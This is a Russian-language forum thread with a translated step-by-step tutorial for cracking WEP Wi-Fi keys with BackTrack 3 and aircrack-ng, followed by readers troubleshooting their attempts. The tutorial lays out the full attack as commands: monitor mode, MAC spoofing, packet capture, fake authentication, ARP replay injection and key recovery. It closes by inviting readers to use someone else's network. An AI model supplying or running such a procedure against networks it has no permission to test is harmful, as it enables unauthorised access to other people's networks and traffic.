![]() |
Взлом WEP с помощью BactTrack 3
Для взлома WEP ключа нам понадобится:
- BactTrack 3 - подходящий wifi адаптер(список). - Точка доступа с WEP-шифрованием - Базовое знание терминов .::Подготовка WIFI адаптера::. Способ #1: Набираем в консоли: Код:
iwconfigКод:
bt ~ # iwconfigчтобы взломать сеть нужно перевести её в режим мониторинга. Для этого пишем: Код:
wlanconfig ath1 create wlandev wifi0 wlanmode monitorСпособ #2: Код:
iwconfigКод:
airmon-ng stop [device]Код:
ifconfig down [interface]Код:
macchanger --mac 00:11:22:33:44:66 [device]Код:
airmon-ng start [device].::Атакуем цель::. Ищем сеть с WEP шифрованием командой: Код:
airodump-ng [device]Запишите MAC адрес сети(BSSID) ключ которой хотите найти , канал (CH) и имя (ESSID). Теперь нужно начинать собирать данные с точки доступа сети для атаки: Код:
airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]Эта команда выведет данные в файл network.out. Затем нужно скормить этот файл другой программе и золотой ключик наш ;) . Откройте другую консоль (оставив эту работать). Теперь нужно сгенерить поддельные пакеты чтобы заставить точку доступа передавать больше данных необходимых для поиска ключа. Протестируйте точку доступа следующей командой: Код:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]Если всё прошло успешно можно начинать генерировать множество пакетов чтобы взломать WEP ключ: Код:
aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]Это заставит точку доступа передать множество пакетов которые мы будем использовать для взлома ключа. Переключитесь на airodump-ng работающий в другой консоли и вы увидите как число "data" пакетов растет со временем. http://thew0rd.com/wp-content/galler...ptureivs_0.png После того как количество пакетов достигнет 10000-20000 (чем больше пакетов тем быстрее будет найден ключ) можно запускать aircrack. Если не получается получить от точки доступа пакеты вышеописанным способом попробуйте ввести: Код:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]Теперь, когда вы собрали достаточное количество пакетов для взлома можно приступать собственно к взлому: Код:
aircrack-ng -n 128 -b [bssid] [filename]-01.caphttp://thew0rd.com/wp-content/galler...ck/crackng.png Всё, ключ найден можно выходить в интернет с помощью чужой сети ;) Источник Переведено и дополнено jawbreaker специально для Античат.ру! |
на самом деле я вызываю
aircrack-ng *.cap и не парюсь, да и для вепа можно параметр -i поставить, тогда собирать будет только ключи инициализации (IVs) файлы тогда будут сохраняться как *.ivs |
Люди явно отстают от жизни))) ставим spoonwep2 и весь взлом упрощается до неузноваемости) пару кликов и через 5 минут у тебя уже ключик) конечно иногда попадаются такие сети где без рук не обойтись, но это редкость))
|
ifconfig down [interface] - что должно быть вместо [interface]?
|
Цитата:
в случае с wi-fi ath0 в случае с ethrnet eth0 |
У меня карта Intel, вместо [device] писал wlan0.. Помоему карты Atheros определяются как ath0 ?..
|
2 способа нагона пакетов не срабатывают ... Это из за чего может быть ? адаптер Edimax EW-7318USG
|
|
Основная проблема в том, что сначала нужно провести фейковую авторизацию, а потом нагонять пакеты.
|
хмммм... может на AP стоит mac фильтр , хотя я на 3 точки генил.
карта моожет ешё .... :confused: |
У меня тоже самое с Orient XG701A. Правда иногда ловит ACKи , но не ловит ARP запросы.
У АР, видимо, сигнал мощнее вот она и ловится со своими ACKами. А ARP-запросы ассоциированного клиента похоже просто не ловятся из-за слабого сигнала => поэтому и идет лесом весь инъект. Я, правда, не уверен. Может у кого еще есть мысли? |
Да, вы правы основная проблема это слабый сигнал.
|
А для Kismet есть инструкции?
|
karlsn перед тем как проводить атаку -3 или -2
сначала нужно что бы атка -1 прошла успешно Код:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]я тоже использую карту Edimax EW-7318USG , с атакой -1 тоже траблы ... хотя наверно дело не в карте а в АРах ... так как некоторые точки доступа открываются с первого раза , некоторые иногда , а иные никак не хотят . |
Цитата:
у меня точка ловится с wep и никак не хочет открываться (-1) хотя тест inj (-9) отличный! а другие dlink очень хорошо открываются!(-1) зависит от ТД! |
хм, столкнулся со странной ситуацией: вместо essid строчка вида <length: 9>
есть мысли по этому поводу? |
(Моё предположение) Что это точки со старыми прошивками, или что-то в этом роде. Т.е. на точке стоит "Hide", но длина имени передается. По идее, ничем не отличается от обычной 0, только с длиной. Скорее всего сделано для того (отображение), чтобы можно было подбирать ссид, при необходимости.
|
Это тип настройки, в настройках при скрытии можно указать скрывать длину essid или не скрывать. Это писалось в Xakep Спец (номер про беспроводные сети)
|
EW-7318USG
bt ~ # wlanconfig ath1 create wlandev wifi0 wlanmode monitor wlanconfig: ioctl: no such device Что ему не понравилось? |
Цитата:
Или так Цитата:
|
Да вот не получается. Выложу полный вывод всех операций. Теперь уже с убунты с установлеными madwifi и aircrack.ng. Пока результаты(выводы) одинаковы, что на bt, что на убунте. По этому позволил себе немного самодеятельности в осях.
Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
|
Цитата:
Тогда порядок таков: Цитата:
Цитата:
|
Цитата:
Ну значит так: Код:
airodump-ng mon0Вывод: Цитата:
Теперь (по мануалу) команда airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device], значит я далжен написать(?): Код:
root@Dana:~# airodump-ng -c 1 -w network.out –bssid 00:21:27:E0:35:D2 mon0Код:
root@Dana:~# airodump-ng -c 1 -w network.out –bssid 00:21:27:E0:35:D2 mon0Цитата:
|
попробуй так root@Dana:~# airodump-ng -c 1 -w network.out --bssid 00:21:27:E0:35:D2 mon0
|
Цитата:
Код:
root@Dana:~# aircrack-ng -n 128 -b 00:21:27:E0:35:D2 network.out-01.cap |
Цитата:
|
Цитата:
2. а ты вот так по пробуй Цитата:
|
| Время: 13:50 |